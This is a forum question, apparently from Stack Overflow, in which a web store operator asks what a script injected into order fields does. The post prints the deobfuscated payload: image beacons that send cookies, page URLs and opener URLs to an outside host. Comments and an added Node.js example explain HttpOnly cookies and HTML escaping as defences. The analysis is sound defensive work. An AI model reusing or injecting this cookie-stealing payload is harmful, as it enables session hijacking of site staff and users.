
I'm operating a web store via one of the popular platforms and had an order come through with the following script embedded in several of the fields (name, address, etc.). I'm trying to understand what the script accomplishes. I've removed any way for it to run on this page, I hope:

[script src=//XX.YY/g][/script]

btw, XX=jb & YY=gy

==>>

// Beacon 1: sends the page URL, top-frame URL, cookies and opener URL to XX.YY via an image request
(function(){
  (new Image()).src = 'http://XX.YY/index.php?do=api&id=g'
    + '&location=' + escape((function(){try{return document.location.href}catch(e){return ''}})())
    + '&toplocation=' + escape((function(){try{return top.location.href}catch(e){return ''}})())
    + '&cookie=' + escape((function(){try{return document.cookie}catch(e){return ''}})())
    + '&opener=' + escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());
})();
// Beacon 2: the condition '1'==1 is always true, so the URL and cookies are sent again to a "keepsession" endpoint
if('1'==1){keep=new Image();keep.src='http://XX.YY/index.php?do=keepsession&id=g&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
// Beacon 3: reports which site the payload fired on
x=new Image();
x.src="http://XX.YY/authtest.php?id=g&info=cheeptrims.com";
A Bomb
  • Looks like something that steals your browser cookies, which is essentially a key to your login session, along with other information, and sends it to a server. Can you supply what XX.YY is? – Nolan Apr 04 '18 at 14:02
  • This would have been executed by employees whenever they loaded this order in our internal network. The session info sent would only have been related to that internal / non-public url. Should we be worried about anything sensitive that might have been transferred? – A Bomb Apr 04 '18 at 14:05
  • This may be a better SE for this question. https://security.stackexchange.com – DeeV Apr 04 '18 at 14:06
  • I would make sure that all your site's cookies are HTTP only. If you are not sure, hit F12 (in Google Chrome), go to the console tab, and type document.cookie. If nothing is returned, your site is secure. Let me know the results. – Nolan Apr 04 '18 at 14:09
  • The XX.YY equates to jb.gy – A Bomb Apr 04 '18 at 14:17
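The payload above only gets its cookie value from document.cookie, which excludes HttpOnly cookies, and it only runs because the order field was rendered unescaped into the internal page. The following is an added example, not code from the question or the comments, showing both defensive checks in Node.js (no external packages; the cookie names and Set-Cookie headers are constructed samples):

```javascript
// 1. HTML-escape untrusted order fields before rendering them in an internal
//    admin page, so a stored <script src=...> is displayed as text, not executed.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '/': '&#x2F;' };
  return String(value).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// 2. Audit Set-Cookie headers: cookies named in sessionNames must carry HttpOnly
//    (keeps them out of document.cookie) and Secure; every cookie should set SameSite.
//    Returns a list of human-readable findings (empty list = nothing to fix).
function auditSetCookie(setCookieHeaders, sessionNames) {
  const findings = [];
  for (const header of setCookieHeaders) {
    const parts = header.split(';').map((p) => p.trim());
    const name = parts[0].split('=')[0];
    const attrs = parts.slice(1).map((p) => p.toLowerCase());
    const isSession = sessionNames.includes(name);
    if (isSession && !attrs.includes('httponly')) findings.push(`${name}: missing HttpOnly`);
    if (isSession && !attrs.includes('secure')) findings.push(`${name}: missing Secure`);
    if (!attrs.some((a) => a.startsWith('samesite='))) findings.push(`${name}: missing SameSite`);
  }
  return findings;
}

// Constructed sample: an order "name" field carrying the tag from the question.
const order = { name: '<script src=//XX.YY/g></script>' };
console.log('rendered safely as:', escapeHtml(order.name));

// Constructed sample Set-Cookie headers from an internal order-management app.
const sampleHeaders = [
  'PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'admin_session=def456; Path=/admin',
];
console.log(auditSetCookie(sampleHeaders, ['PHPSESSID', 'admin_session']));
```

The audit flags only the second cookie; a session cookie like it is exactly what the first beacon would have captured.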

0 Answers